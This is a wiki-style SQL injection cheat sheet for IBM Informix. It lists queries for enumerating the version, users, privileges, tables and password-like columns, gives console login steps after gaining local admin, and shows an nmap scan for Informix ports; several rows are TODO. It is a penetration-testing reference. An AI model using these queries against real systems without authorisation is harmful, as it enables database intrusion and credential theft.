====== Hacking - SQL Injection Cheat Sheet (Informix) ======

| Version | SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1; \\ SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1; \\ SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version', 'level') FROM systables WHERE tabid = 1; \\ SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; -- T=Windows, U=32-bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit Unix |
| Comments | select 1 FROM systables WHERE tabid = 1; -- comment |
| Current User | SELECT USER FROM systables WHERE tabid = 1; \\ select CURRENT_ROLE FROM systables WHERE tabid = 1; |
| List Users | select username, usertype, password from sysusers; |
| List Password Hashes | TODO |
| List Privileges | select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; -- which tables are accessible by which users \\ select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; -- which procedures are accessible by which users |
| List DBA Accounts | TODO |
| Current Database | SELECT DBSERVERNAME FROM systables where tabid = 1; -- server name |
| List Databases | select name, owner from sysdatabases; |
| List Columns | select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid; |
| List Tables | select tabname, owner FROM systables; |
| List Views | select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid; |
| List Stored Procedures | select procname, owner FROM sysprocedures; |
| Find Tables From Column Name | select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like '%pass%'; |
| Select Nth Row | select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; -- selects the 10th row |
| Select Nth Char | SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; -- returns 'C' |
| Bitwise AND | select bitand(6, 1) from systables where tabid = 1; -- returns 0 \\ select bitand(6, 2) from systables where tabid = 1; -- returns 2 |
| ASCII Value -> Char | TODO |
| Char -> ASCII Value | select ascii('A') from systables where tabid = 1; |
| Casting | select cast('123' as integer) from systables where tabid = 1; \\ select cast(1 as char) from systables where tabid = 1; |
| String Concatenation | SELECT 'A' %%||%% 'B' FROM systables where tabid = 1; -- returns 'AB' \\ SELECT concat('A', 'B') FROM systables where tabid = 1; -- returns 'AB' |
| String Length | SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables; |
| If Statement | TODO |
| Case Statement | select tabid, case when tabid > 10 then 'High' else 'Low' end from systables; |
| Avoiding Quotes | TODO |
| Time Delay | TODO |
| Make DNS Requests | TODO |
| Command Execution | TODO |
| Local File Access | TODO |
| Hostname, IP Address | SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; -- hostname |
| Location of DB files | TODO |
| Default/System Databases | These are the system databases: \\ sysmaster \\ sysadmin* \\ sysuser* \\ sysutils* \\ * = don't seem to contain anything / don't allow reading |
| Installing Locally | You can download [[https://www.ibm.com/developerworks/downloads/im/dsexp/?S_TACT=105AGX11&S_CMP=LP|Informix Dynamic Server Express Edition 11.5 Trial]] for Linux and Windows. |
| Database Client | There's a [[https://www14.software.ibm.com/webapp/download/search.jsp?rs=ifxdl|database client SDK]] available, which might be of use. I couldn't get the demo client working. I used [[http://squirrel-sql.sourceforge.net/|SQuirreL SQL Client Version 2.6.8]] after installing the [[https://www14.software.ibm.com/webapp/download/search.jsp?go=y&rs=ifxjdbc|Informix JDBC drivers]] ("emerge dev-java/jdbc-informix" on Gentoo). |
| Logging in from command line | If you get local admin rights on a Windows box and have a GUI logon: \\ - Click: %%Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername%%. This will give you a command prompt with the various environment variables set properly. \\ - Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases. \\ The following were set on my test system. This may help if you get command line access but can't get a GUI; you'll need to change "testservername": \\ set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50 \\ set INFORMIXSERVER=testservername \\ set ONCONFIG=ONCONFIG.testservername \\ set PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib;C:\Program Files\IBM\Informix\Clien-SDK\bin;C:\Program Files\ibm\gsk7\bin;C:\Program Files\ibm\gsk7\lib \\ set CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;C:\PROGRA~1\IBM\IBMINF~1\11.50\xtend\krakatoa\jdbc.jar; \\ set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp \\ set CLIENT_LOCALE=EN_US.CP1252 \\ set DB_LOCALE=EN_US.8859-1 \\ set SERVER_LOCALE=EN_US.CP1252 \\ set DBLANG=EN_US.CP1252 \\ mode con codepage select=1252 |
| Identifying on the network | My default installation listened on two TCP ports: 9088 and 9099. When I created a new "server name", this listened on 1526/TCP by default. Nmap 4.76 didn't identify these ports as Informix: \\ $ sudo nmap -sS -sV 10.0.0.1 -p- -v --version-all \\ ... \\ 1526/tcp open pdap-np? \\ 9088/tcp open unknown \\ 9089/tcp open unknown \\ ... \\ TODO How would we identify Informix listening on the network? |

----

===== References =====

https://www.michaelboman.org/books/sql-injection-cheat-sheet-informix